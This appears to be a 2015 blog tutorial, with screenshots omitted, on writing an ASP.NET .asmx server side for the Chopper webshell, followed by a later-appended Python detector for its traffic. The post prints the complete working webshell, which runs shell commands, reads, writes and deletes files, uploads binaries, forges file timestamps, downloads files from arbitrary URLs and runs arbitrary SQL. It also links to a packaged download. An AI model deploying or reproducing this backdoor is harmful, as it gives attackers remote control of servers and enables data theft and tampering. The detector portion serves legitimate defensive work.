Chopper (菜刀) Customize-type server side, asmx version


Jun 24 2015


Author: RedFree

A few days ago I had just learned a bit of ASP.NET and, afraid of forgetting it, struck while the iron was hot and took a look at WebService along the way. I had never touched WebService before and it was unfamiliar; searching bit by bit, I barely managed to finish an asmx version of the Chopper Customize-type server side. If there are mistakes, please point them out.
    As with the other server-side types, completing the interaction with the client requires two things: 1. parameters can be obtained; 2. content can be returned. So I started from these two most basic points.
    Create a new website in VS2012 and set it up as in the following figures:

3.jpg

2.jpg

1.jpg

You can see that once the setup is done, VS has already generated part of the code.
    Press F5 to debug and take a look:

4.jpg

Click HelloWorld; the page already shows an example request and response:

5.jpg

Since Chopper uses HTTP POST, the SOAP request will not be used; click the Invoke button and see:

6.jpg

XML is returned, and the string tag contains the "Hello World" returned by the code.
So how do we get the parameters?
    Try rewriting the code as follows:

7.jpg

An error appeared; after a good deal of searching I found the solution (my fundamentals are so weak that even this small problem cost me a lot of time).


using System;
using System.Collections.Generic;
using System.Web;
using System.Web.Services;

[WebService(Namespace = "http://tempuri.org/")]
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]

public class Service : System.Web.Services.WebService
{
    public Service () {

        //If you use designed components, uncomment the following line
        //InitializeComponent();
    }

    [WebMethod]
    public string HelloWorld() {
        String Z = HttpContext.Current.Request.Form["z"];
        return Z;
    }
    
}
Finally got the desired effect:


8.jpg

Since we can both obtain parameters and return results, let's take the code of the Customize.aspx bundled with Chopper, modify it, and see what happens.

14.jpg

return the execution result, then request it in the browser to see the effect:

9.jpg

The result looked satisfactory, but when I connected with Chopper it turned into this:

10.jpg

Look at the page source:

11.jpg

Damn, some characters got escaped... From http://www.cnblogs.com/qiantuwuliang/archive/2010/03/29/1699361.html I learned that CDATA can be used to solve the escaping problem.
    Modify the source as follows and request it in the browser to see the effect:

12.jpg

13.jpg

Got the satisfactory result (Chopper takes only the content between ->| and |<-; the other characters do not affect the result). Of course, directly writing

HttpContext.Current.Response.Write("\x2D\x3E\x7C" + R + "\x7C\x3C\x2D");

also works; although an XML error is reported, it does not affect the execution result (not an option for perfectionists).
    Write the code from the cs file into the asmx file, and you finally get the server side with the asmx suffix:


<%@ WebService Language="C#" Class="Service" %>
using System;
using System.Web;
using System.IO;
using System.Net;
using System.Text;
using System.Data;
using System.Data.SqlClient;
using System.Collections.Generic;
using System.Diagnostics;
using System.Web.SessionState;
using System.Web.Services;

[WebService(Namespace = "http://www.wooyun.org/whitehats/RedFree")]
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]

public class Service : System.Web.Services.WebService
{
    public Service()
    {

        //If you use designed components, uncomment the following line
        //InitializeComponent();
    }

    [WebMethod]
    public string Chopper() {
        String Z = HttpContext.Current.Request.Form["z"];//set the password
        if (Z != "")
        {
            String Z1 = HttpContext.Current.Request.Form["Z1"];
            String Z2 = HttpContext.Current.Request.Form["Z2"];
            String R = "";
            try
            {
                switch (Z)
                {
                    case "A":
                        {
                            String[] c = Directory.GetLogicalDrives();
                            R = String.Format("{0}\t", HttpContext.Current.Server.MapPath("/"));
                            for (int i = 0; i < c.Length; i++)
                                R += c[i][0] + ":";
                            break;
                        }
                    case "B":
                        {
                            DirectoryInfo m = new DirectoryInfo(Z1);
                            foreach (DirectoryInfo D in m.GetDirectories())
                            {
                                R += String.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"));
                            }
                            foreach (FileInfo D in m.GetFiles())
                            {
                                R += String.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length);
                            }
                            break;
                        }
                    case "C":
                        {
                            StreamReader m = new StreamReader(Z1, Encoding.Default);
                            R = m.ReadToEnd();
                            m.Close();
                            break;
                        }
                    case "D":
                        {
                            StreamWriter m = new StreamWriter(Z1, false, Encoding.Default);
                            m.Write(Z2);
                            R = "1";
                            m.Close();
                            break;
                        }
                    case "E":
                        {
                            if (Directory.Exists(Z1))
                            {
                                Directory.Delete(Z1, true);
                            }
                            else
                            {
                                File.Delete(Z1);
                            }
                            R = "1";
                            break;
                        }
                    case "F":
                        {
                            HttpContext.Current.Response.Clear();
                            HttpContext.Current.Response.Write("<?xml version=\"1.0\" encoding=\"utf-8\"?>");
                            HttpContext.Current.Response.Write("<data>");
                            HttpContext.Current.Response.Write("<![CDATA[");
                            HttpContext.Current.Response.Write("\x2D\x3E\x7C");
                            HttpContext.Current.Response.WriteFile(Z1);
                            HttpContext.Current.Response.Write("\x7C\x3C\x2D");
                            HttpContext.Current.Response.Write("]]>");
                            HttpContext.Current.Response.Write("</data>");
                            HttpContext.Current.Response.End();
                            goto End;
                        }
                    case "G":
                        {
                            byte[] B = new byte[Z2.Length / 2];
                            for (int i = 0; i < Z2.Length; i += 2)
                            {
                                B[i / 2] = (byte)Convert.ToInt32(Z2.Substring(i, 2), 16);
                            }
                            FileStream fs = new FileStream(Z1, FileMode.Create);
                            fs.Write(B, 0, B.Length);
                            fs.Close();
                            R = "1";
                            break;
                        }
                    case "H":
                        {
                            CP(Z1, Z2);
                            R = "1";
                            break;
                        }
                    case "I":
                        {
                            if (Directory.Exists(Z1))
                            {
                                Directory.Move(Z1, Z2);
                            }
                            else
                            {
                                File.Move(Z1, Z2);
                            }
                            break;
                        }
                    case "J":
                        {
                            Directory.CreateDirectory(Z1);
                            R = "1";
                            break;
                        }
                    case "K":
                        {
                            DateTime TM = Convert.ToDateTime(Z2);
                            if (Directory.Exists(Z1))
                            {
                                Directory.SetCreationTime(Z1, TM);
                                Directory.SetLastWriteTime(Z1, TM);
                                Directory.SetLastAccessTime(Z1, TM);
                            }
                            else
                            {
                                File.SetCreationTime(Z1, TM);
                                File.SetLastWriteTime(Z1, TM);
                                File.SetLastAccessTime(Z1, TM);
                            }
                            R = "1";
                            break;
                        }
                    case "L":
                        {
                            HttpWebRequest RQ = (HttpWebRequest)WebRequest.Create(new Uri(Z1));
                            RQ.Method = "GET";
                            RQ.ContentType = "application/x-www-form-urlencoded";
                            HttpWebResponse WB = (HttpWebResponse)RQ.GetResponse();
                            Stream WF = WB.GetResponseStream();
                            FileStream FS = new FileStream(Z2, FileMode.Create, FileAccess.Write);
                            int i;
                            byte[] buffer = new byte[1024];
                            while (true)
                            {
                                i = WF.Read(buffer, 0, buffer.Length);
                                if (i < 1)
                                {
                                    break;
                                }
                                FS.Write(buffer, 0, i);
                            }
                            WF.Close();
                            WB.Close();
                            FS.Close();
                            R = "1";
                            break;
                        }
                    case "M":
                        {
                            ProcessStartInfo c = new ProcessStartInfo(Z1.Substring(2));
                            Process e = new Process();
                            StreamReader OT, ER;
                            c.UseShellExecute = false;
                            c.RedirectStandardOutput = true;
                            c.RedirectStandardError = true;
                            e.StartInfo = c;
                            c.Arguments = String.Format("{0} {1}", Z1.Substring(0, 2), Z2);
                            e.Start();
                            OT = e.StandardOutput;
                            ER = e.StandardError;
                            e.Close();
                            R = OT.ReadToEnd() + ER.ReadToEnd();
                            break;
                        }
                    case "N":
                        {
                            String strDat = Z1.ToUpper();
                            SqlConnection Conn = new SqlConnection(Z1);
                            Conn.Open();
                            R = Conn.Database + "\t";
                            Conn.Close();
                            break;
                        }
                    case "O":
                        {
                            String[] x = Z1.Replace("\r", "").Split('\n');
                            String strConn = x[0], strDb = x[1];
                            SqlConnection Conn = new SqlConnection(strConn);
                            Conn.Open();
                            DataTable dt = Conn.GetSchema("Columns");
                            Conn.Close();
                            for (int i = 0; i < dt.Rows.Count; i++)
                            {
                                R += String.Format("{0}\t", dt.Rows[i][2].ToString());
                            }
                            break;
                        }
                    case "P":
                        {
                            String[] x = Z1.Replace("\r", "").Split('\n'), p = new String[4];
                            String strConn = x[0], strDb = x[1], strTable = x[2];
                            p[0] = strDb;
                            p[2] = strTable;
                            SqlConnection Conn = new SqlConnection(strConn);
                            Conn.Open();
                            DataTable dt = Conn.GetSchema("Columns", p);
                            Conn.Close();
                            for (int i = 0; i < dt.Rows.Count; i++)
                            {
                                R += String.Format("{0} ({1})\t", dt.Rows[i][3].ToString(), dt.Rows[i][7].ToString());
                            }
                            break;
                        }
                    case "Q":
                        {
                            String[] x = Z1.Replace("\r", "").Split('\n');
                            String strDat, strConn = x[0], strDb = x[1];
                            int i, c;
                            strDat = Z2.ToUpper();
                            SqlConnection Conn = new SqlConnection(strConn);
                            Conn.Open();
                            if (strDat.IndexOf("SELECT ") == 0 || strDat.IndexOf("EXEC ") == 0 || strDat.IndexOf("DECLARE ") == 0)
                            {
                                SqlDataAdapter OD = new SqlDataAdapter(Z2, Conn);
                                DataSet ds = new DataSet();
                                OD.Fill(ds);
                                if (ds.Tables.Count > 0)
                                {
                                    DataRowCollection rows = ds.Tables[0].Rows;
                                    for (c = 0; c < ds.Tables[0].Columns.Count; c++)
                                    {
                                        R += String.Format("{0}\t|\t", ds.Tables[0].Columns[c].ColumnName.ToString());
                                    }
                                    R += "\r\n";
                                    for (i = 0; i < rows.Count; i++)
                                    {
                                        for (c = 0; c < ds.Tables[0].Columns.Count; c++)
                                        {
                                            R += String.Format("{0}\t|\t", rows[i][c].ToString());
                                        }
                                        R += "\r\n";
                                    }
                                }
                                ds.Clear();
                                ds.Dispose();
                            }
                            else
                            {
                                SqlCommand cm = Conn.CreateCommand();
                                cm.CommandText = Z2;
                                cm.ExecuteNonQuery();
                                R = "Result\t|\t\r\nExecute Successfully!\t|\t\r\n";
                            }
                            Conn.Close();
                            break;
                        }
                    default: goto End;
                }
            }
            catch (Exception E)
            {
                R = "ERROR:// " + E.Message;
            }
            HttpContext.Current.Response.Write("<?xml version=\"1.0\" encoding=\"utf-8\"?>");
            HttpContext.Current.Response.Write("<data>");
            HttpContext.Current.Response.Write("<![CDATA[");
            HttpContext.Current.Response.Write("\x2D\x3E\x7C" + R + "\x7C\x3C\x2D");
            HttpContext.Current.Response.Write("]]>");
            HttpContext.Current.Response.Write("</data>");
            HttpContext.Current.Response.End();
        End: ;
        }
        return "";
    }
    public void CP(String S, String D)
    {
        if (Directory.Exists(S))
        {
            DirectoryInfo m = new DirectoryInfo(S);
            Directory.CreateDirectory(D);
            foreach (FileInfo F in m.GetFiles())
            {
                File.Copy(S + "\\" + F.Name, D + "\\" + F.Name);
            }
            foreach (DirectoryInfo F in m.GetDirectories())
            {
                CP(S + "\\" + F.Name, D + "\\" + F.Name);
            }
        }
        else
        {
            File.Copy(S, D);
        }
    }
}



Note that the connection address is not http://xxx.xx/xx.asmx!
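A defender-side check, added here and not part of the original post or of Chopper, that flags the two artifacts the post describes: a POST to a .asmx web method whose form carries z=&lt;single command letter&gt; with optional Z1/Z2, and a response whose payload sits between the ->| and |<- markers, inside CDATA or raw. The `.asmx/<Method>` path form, the sample traffic and the function names are my assumptions.

```python
import re
from urllib.parse import parse_qs

# Marker pair from the post: Chopper reads only the text between "->|" and
# "|<-", whether or not it is wrapped in a CDATA section.
MARKER_RE = re.compile(r"->\|(.*?)\|<-", re.DOTALL)
# The form field "z" carries the single-letter command selector (A..Q).
COMMAND_RE = re.compile(r"^[A-Q]$")


def is_chopper_style_request(method, path, body):
    """Flag a POST to a .asmx web method whose form is z=<letter> (+ Z1/Z2)."""
    if method.upper() != "POST" or ".asmx/" not in path.lower():
        return False
    form = parse_qs(body, keep_blank_values=True)
    z = form.get("z", [""])[0]
    if not COMMAND_RE.match(z):
        return False
    # Any field other than z/Z1/Z2 makes this look like a normal form post.
    return not (set(form) - {"z", "Z1", "Z2"})


def extract_marked_result(response_body):
    """Return the text between the ->| and |<- markers, or None if absent."""
    m = MARKER_RE.search(response_body)
    return m.group(1) if m else None


# Constructed samples (assumed, not captured traffic).
SHELL_REQ = ("POST", "/Service.asmx/Chopper", "z=A&Z1=&Z2=")
SOAP_REQ = ("POST", "/Service.asmx", "<soap:Envelope/>")
BENIGN_POST = ("POST", "/Service.asmx/HelloWorld", "name=bob")
SHELL_RESP = ('<?xml version="1.0" encoding="utf-8"?><data>'
              '<![CDATA[->|C:\\inetpub\\wwwroot\\\tC:D:|<-]]></data>')
RAW_RESP = "->|1|<-"          # the no-CDATA variant the post mentions
NORMAL_RESP = '<string xmlns="http://tempuri.org/">Hello World</string>'


def scan(requests, responses):
    """Count suspicious requests and collect marker-delimited response payloads."""
    hits = [r for r in requests if is_chopper_style_request(*r)]
    results = [extract_marked_result(b) for b in responses]
    return len(hits), [x for x in results if x is not None]


if __name__ == "__main__":
    print(scan([SHELL_REQ, SOAP_REQ, BENIGN_POST],
               [SHELL_RESP, RAW_RESP, NORMAL_RESP]))
```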

15.jpg

16.jpg

17+.jpg

Apart from the database management features, all other features tested normally; if there are problems you can @ me.
Baidu cloud download address: link: http://pan.baidu.com/s/1sjG83iX password: 5f52


Customize(moon).rar


Copyright notice: unless otherwise noted, this article is an original by mOon; please keep the source when reposting.
